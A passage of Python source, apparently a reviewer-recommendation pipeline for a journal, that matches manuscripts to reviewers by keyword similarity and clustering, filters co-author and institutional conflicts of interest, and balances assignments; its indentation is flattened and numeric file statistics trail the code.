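# e.g. remove_string_special_characters("Hello, World! 123") -> "hello world"
# (digits and punctuation removed, whitespace collapsed, lower-cased).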
# Object-list sorting function definition
def multisort(xs, specs):
for key, reverse in reversed(specs):
xs.sort(key=attrgetter(key), reverse=reverse)
return xs
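# e.g. multisort(papers, (('date', False), ('sim', True))) orders by date
# ascending, breaking ties by sim descending (stable sorts applied in
# reverse spec order).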
# Attribute-set extraction function definition
# Keyword arguments (input csv path, output csv path including the attribute set, number of words to extract)
def extractive_keyword(path,database_update_path,extract_word_num=20):
reviewee = pd.read_csv(path, encoding='latin1')
count,temp = len(reviewee),[]
for i in range(count):
temp_intro = reviewee['submitter_intro'][i]
temp_sent = summarize(reviewee['submitter_intro'][i], ratio=0.05)
textrank_textsent_mearge = ''
textrank_text,textrank_sent = '',''
for c in (keywords(temp_intro, words=extract_word_num-(extract_word_num//4), lemmatize=True).split('\n')):
textrank_text += (c+ " ")
for cc in (keywords(temp_sent, words=(extract_word_num//4), lemmatize=True).split('\n')):
textrank_sent += (cc+ " ")
temp.append(textrank_text + " " + textrank_sent)
reviewee['submitter_attribute']=temp
reviewee.iloc[:,1:].to_csv(database_update_path)
#return type : pandas.dataframe
return reviewee
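# Illustrative effect (hypothetical data): with extract_word_num=20, roughly
# 15 TextRank keywords from the full submitter_intro plus 5 from its 5%
# summary are joined into one space-separated 'submitter_attribute' string
# per row.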
# Professionalism (expertise) check function definition
# Keyword arguments (input csv path, submitted-manuscript DataFrame, i-th submitted manuscript, number of reviewers to recommend, silhouette computation range)
def professionalism(path,extractive_keyword_result,reviewee_index,top_limit,silhouette_range=25):
reviewee=extractive_keyword_result
index=reviewee_index
top=top_limit
temp_id,temp_doi = 0,''
temp_title = reviewee.loc[index]['submitter_title']
temp_attribure = reviewee.loc[index]['submitter_attribute']
reviewer_attr = pd.read_csv(path, encoding='latin1')
reviewer_attr.loc[-1]=[str(temp_id),temp_doi,temp_title,temp_attribure]
reviewer_attr.index += 1
reviewer_attr.sort_index(inplace=True)
reviewer=reviewer_attr['reviewer_paper_attribure']
jac_token,jac,cos,avg=[],[],[],[]
for t in range(len(reviewer)):
jac_token.append(set(nltk.ngrams((nltk.word_tokenize(reviewer[t])), n=1)))
for j in range(len(reviewer)):
jac.append(1-(nltk.jaccard_distance(jac_token[0], jac_token[j])))
count_vectorizer = CountVectorizer()  # note: an earlier stop_words='english' instance was immediately overwritten; the effective behavior is kept
sparse_matrix = count_vectorizer.fit_transform(reviewer)
doc_term_matrix = sparse_matrix.todense()
df = pd.DataFrame(doc_term_matrix,
columns=count_vectorizer.get_feature_names(),
index=[i for i in reviewer])
cos=cosine_similarity(df, df)[0].tolist()
for i in range(len(jac)):
avg.append((jac[i] + cos[i])/2)
reviewer_attr['sim']=avg
vectorizer = TfidfVectorizer(stop_words='english')
Y = vectorizer.fit_transform(reviewer)
YY = Y.toarray()
X = StandardScaler().fit_transform(YY)
top_avg,top_k=0,0
silhouette,k_mean,k_mean2=[],[],[]
for i in range(2,silhouette_range+1,1):
model = SpectralClustering(n_clusters=i, affinity="nearest_neighbors")
cluster_labels = model.fit_predict(X)
sample_silhouette_values = silhouette_samples(YY, cluster_labels)
silhouette_avg = sample_silhouette_values.mean()
if top_avg < silhouette_avg:
top_avg = silhouette_avg
top_k = i
silhouette_temp=[]
silhouette_temp.append('when k=' + str(i) + ': ')
silhouette_temp.append(silhouette_avg)
silhouette.append(silhouette_temp)
model = KMeans(n_clusters=(top_k), init='k-means++', max_iter=100, n_init=1)
model.fit(Y)
for k in range(len(reviewer)):
YYY = vectorizer.transform([reviewer[k]])
prediction = model.predict(YYY)
k_mean.append(prediction)
for k in range(len(reviewer)):
k_mean2.append(int(k_mean[k][0]))
reviewer_attr['k_mean']=k_mean2
kmean_reviewer = reviewer_attr[reviewer_attr['k_mean'] == reviewer_attr.loc[0]['k_mean']]
kmean_reviewer2 = kmean_reviewer.sort_values(by=['sim'], axis=0, ascending=False)
professionalism=kmean_reviewer2.iloc[1:top+1]
#return type : pandas.dataframe
return professionalism
# Conflict-of-interest check function definition
# Keyword arguments (reviewer co-author csv path, reviewer information csv path, reviewer co-author network csv path,
# professionalism check result DataFrame, submitted-manuscript DataFrame, i-th submitted manuscript, number of reviewers to recommend, co-author network matrix multiplication count)
def interest(co_author_path, reviewer_information_path, co_author_network_path, professionalism_result, extractive_keyword_result, reviewee_index,top_limit,matrix_multifly_count):
crash_result,reviewee_list=[],[]
reviewer_list1,reviewer_co_list=[],[]
path1=co_author_path
path2=reviewer_information_path
network_path=co_author_network_path
temp = professionalism_result
reviewee=extractive_keyword_result
index=reviewee_index
top=top_limit
multifly=matrix_multifly_count
co_author_csv = pd.read_csv(path1, encoding='latin1')
co_author_df = co_author_csv.merge(temp, on=['reviewer_orcid'])
tt = co_author_df.iloc[:]['reviewer_name'].tolist()
reviewee_list=[]
reviewee.fillna(0, inplace=True)
for i in range(1,11):
col_index = (i*3)+5
if reviewee.loc[index][col_index] != 0:
reviewee_list.append(reviewee.loc[index][col_index])
reviewer_list,reviewer_co_list=[],[]
for j in range(len(co_author_csv)):
co_list_temp=[]
reviewer_list.append(co_author_csv['reviewer_name'][j])
co_list_temp.append(co_author_csv['reviewer_name'][j])
for i in range(1,11):
col_index = (i*2)
if co_author_csv.loc[j][col_index] != 0:
co_list_temp.append(co_author_csv.loc[j][col_index])
reviewer_co_list.append(co_list_temp)
co_rel_df = pd.DataFrame(
columns=[i for i in reviewer_list],
index=[j for j in reviewee_list])
for j in range(len(reviewee_list)):
for i in range(len(reviewer_list)):
for k in range(len(reviewer_co_list[i])):
if reviewee_list[j] == reviewer_co_list[i][k]:
co_rel_df.iat[j, i] = 1
co_rel_df.fillna(0, inplace=True)
try :
matrix_df = pd.read_csv(co_author_network_path, encoding='latin1', index_col=0)
except FileNotFoundError :
index = co_author_csv['reviewer_orcid'].index[co_author_csv['reviewer_orcid'].apply(np.isnan)]
df_index = co_author_csv.index.values.tolist()
nan_range =[df_index.index(i) for i in index]
try :
import_csv2=co_author_csv.iloc[:nan_range[0]]
id_list=import_csv2['reviewer_name'].tolist()
except IndexError :
import_csv2=co_author_csv
id_list = co_author_csv.iloc[:]['reviewer_name'].tolist()
matrix_df = pd.DataFrame(
columns=[i for i in id_list],
index=[j for j in id_list])
for i in range(len(id_list)):
for j in range(len(id_list)):
index=[1,]
index.extend([(j*2) for j in range(1,11)])
for k in range(11):
if (id_list[i]) == (import_csv2.iloc[j][index[k]]) :
print(id_list[i], import_csv2.iloc[j][index[k]])
print(i)
matrix_df.iat[j, i] = 1
matrix_df.iat[i, j] = 1
if str(id_list[i]) == str(id_list[j]):
matrix_df.iat[i, j] = 0
matrix_df.fillna(0, inplace=True)
matrix_df.to_csv(co_author_network_path)
for i in range(multifly):
matrix_df = matrix_df.dot(matrix_df)
a=matrix_df.values
b=co_rel_df.values
aaa = b.dot(a)
aaa2=pd.DataFrame(data=aaa,
index=(co_rel_df.index).tolist(),
columns=(matrix_df.index).tolist())
a_series = (aaa2 != 0).any(axis=1)
new_df = aaa2.loc[a_series]
ccc=(new_df.index).tolist()
ddd=co_author_df['reviewer_name'].tolist()
reviewer_list1 = list(set(ddd).difference(ccc))
co_inst_csv = pd.read_csv(path2, encoding='latin1')
co_inst_df = co_inst_csv.merge(temp, on=['reviewer_orcid'])
reviewee_list2,reviewer_list2,reviewer_inst_list=[],[],[]
reviewee.fillna(0, inplace=True)
for i in range(1,11):
col_index = (i*3)+6
if reviewee.loc[index][col_index] != 0:
reviewee_list2.append(reviewee.loc[index][col_index])
for j in range(len(co_inst_df)):
inst_list_temp=[]
reviewer_list2.append(co_inst_df['reviewer_name'][j])
reviewer_inst_list.append(co_inst_df['reviewer_institution'][j])
inst_rel_df = pd.DataFrame(
columns=[i for i in reviewee_list2],
index=[j for j in reviewer_list2])
for i in range(len(reviewee_list2)):
for j in range(len(reviewer_list2)):
if reviewee_list2[i] == reviewer_inst_list[j]:
inst_rel_df.iat[j, i] = 1
for i in range(len(reviewer_list2)):
if (inst_rel_df.sum(axis=1)[i]) > 0:
reviewer_list2.remove(inst_rel_df.index[i])
crash_result.append(inst_rel_df.index[i])
reviewer_list1,reviewer_list2 = reviewer_list1[0:top*2],reviewer_list2[0:top*2]
reviewer_rank = list(set(reviewer_list1).intersection(reviewer_list2))
id_index,sim_index,count_index=[],[],[]
reviewer_rank = pd.DataFrame({'reviewer_name': reviewer_rank})
for i in range(len(reviewer_rank)):
for j in range(len(co_author_df)):
if reviewer_rank.loc[i]['reviewer_name'] == co_author_df.loc[j]['reviewer_name'] :
id_index.append(int(co_author_df.iloc[j]['reviewer_orcid']))
sim_index.append(co_author_df.iloc[j]['sim'])
if reviewer_rank.loc[i]['reviewer_name'] == co_inst_df.loc[j]['reviewer_name'] :
count_index.append(co_inst_df.iloc[j]['count'])
reviewer_rank['reviewer_orcid']=id_index
reviewer_rank['sim']=sim_index
reviewer_rank['count']=count_index
#return type : pandas.dataframe
return reviewer_rank
# CSV save function definition
# Keyword arguments (save_path, submitted-manuscript DataFrame, professionalism check DataFrame, i-th submitted manuscript, number of reviewers to recommend)
def save_csv(output_path,extractive_keyword_result,professionalism_result,reviewee_index,top_limit):
path=output_path
reviewee=extractive_keyword_result
reviewer_rank_name=professionalism_result
ee_num=reviewee_index
top=top_limit
export_data=[]
for i in range((top*2)):
temp=[]
temp.append(reviewee.iloc[(1//top*2)+ee_num]['submitter_title'])
temp.append(reviewee.iloc[(1//top*2)+ee_num]['date'])
temp.append(reviewee.iloc[(1//top*2)+ee_num]['submitter_name'])
temp.append(reviewer_rank_name.iloc[i]['reviewer_name'])
temp.append(reviewer_rank_name.iloc[i]['reviewer_orcid'])
temp.append(reviewer_rank_name.iloc[i]['sim'])
temp.append(reviewer_rank_name.iloc[i]['count'])
export_data.append(temp)
try :
export_csv = pd.read_csv(path,index_col=0)
except FileNotFoundError :
export_csv = pd.DataFrame([],columns=[
'submitter_title','date','submitter_name','reviewer_name','reviewer_orcid','sim','count'])
for i in range(len(export_data)):
export_csv.loc[len(export_csv)] = export_data[i]
export_csv.to_csv(path)
# Even-distribution function definition
# Keyword arguments (input csv path, output csv path)
def equl_distribution(input_csv_path, output_csv_path):
final_list=[]
export_csv2 = pd.read_csv(input_csv_path,index_col=0)
class Paper:
def __init__(self, title, date, submitter, reviwer_name, reviwer_orcid, sim, count):
self.title = title
self.date = date
self.submitter = submitter
self.reviwer_name = reviwer_name
self.reviwer_orcid = reviwer_orcid
self.sim = sim
self.count = count
def __repr__(self):
return repr((self.title, self.date, self.submitter, self.reviwer_name, self.reviwer_orcid, self.sim, self.count))
papers,objs=[export_csv2.iloc[i].tolist() for i in range(len(export_csv2))],[]
for paper in papers:
objs.append(Paper(*paper))
o = (multisort(list(objs), (('date', False), ('sim', True))))
for i in range(0,len(export_csv2),6) :
temp_list=[]
for t in range(6):
if len(temp_list) == 3:
break
else :
temp = i + t
if (o[temp].count) < 3 :
o[temp].count += 1
for j in range(0+temp, len(export_csv2)) :
if (o[temp].reviwer_name == o[j].reviwer_name) :
o[j].count += 1
o[temp].count -= 1
temp_list.append(o[temp])
final_list.extend(temp_list)
final=pd.DataFrame(final_list,columns=['result'])
final.to_csv(output_csv_path)
# Default (main) execution function definition
def main():
# Attribute-set extraction for the submitted manuscripts
# Keyword arguments (input csv path, output csv path including the attribute set, number of words to extract)
reviewee=extractive_keyword(path='../reviewee/submitter_10.csv',
database_update_path='../reviewee/reviwupdate.csv',
extract_word_num=20)
#return type : pandas.dataframe
# Run the review pipeline once per submitted manuscript
for i in range(len(reviewee)):
# Professionalism check
# Keyword arguments (input csv path, submitted-manuscript DataFrame, i-th submitted manuscript, number of reviewers to recommend, silhouette computation range)
reviewer=professionalism(path='../reviewer_pool/reviewer_attribute_5.csv',
extractive_keyword_result=reviewee,
reviewee_index=i,
top_limit=10,
silhouette_range=25)
#return type : pandas.dataframe
# Conflict-of-interest check
# Keyword arguments (reviewer co-author csv path, reviewer information csv path, reviewer co-author network csv path,
# professionalism check result DataFrame, submitted-manuscript DataFrame, i-th submitted manuscript, number of reviewers to recommend, co-author network matrix multiplication count)
reviewer_rank = interest(
co_author_path='../reviewer_pool/reviewer_coauthor_5.csv',
reviewer_information_path='../reviewer_pool/reviewer_information_5.csv',
co_author_network_path='../reviewer_pool/co_author_network_0525.csv',
professionalism_result=reviewer,
extractive_keyword_result=reviewee,
reviewee_index=i,
top_limit=6,
matrix_multifly_count=1)
#return type : pandas.dataframe
# Save to csv
# Keyword arguments (save_path, submitted-manuscript DataFrame, professionalism check DataFrame, i-th submitted manuscript, number of reviewers to recommend)
save_csv(output_path='../system_output/export_csv_0525_10.csv',
extractive_keyword_result=reviewee,
professionalism_result=reviewer_rank,
reviewee_index=i,
top_limit=3)
# Even distribution
# Keyword arguments (input csv path, output csv path)
equl_distribution(input_csv_path='../system_output/export_csv_0525_10.csv',
output_csv_path='../system_output/final_csv_0525_10.csv')
if __name__ == '__main__':
# Default entry point
main()
| 29.01855
| 179
| 0.609949
| 2,208
| 17,208
| 4.491848
| 0.148551
| 0.022585
| 0.013309
| 0.018855
| 0.36217
| 0.260738
| 0.185723
| 0.152853
| 0.129764
| 0.090341
| 0
| 0.014202
| 0.279812
| 17,208
| 593
| 180
| 29.01855
| 0.786089
| 0.06404
| 0
| 0.086687
| 0
| 0
| 0.062341
| 0.022522
| 0
| 0
| 0
| 0
| 0
| 1
| 0.03096
| false
| 0
| 0.105263
| 0.003096
| 0.157895
| 0.006192
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|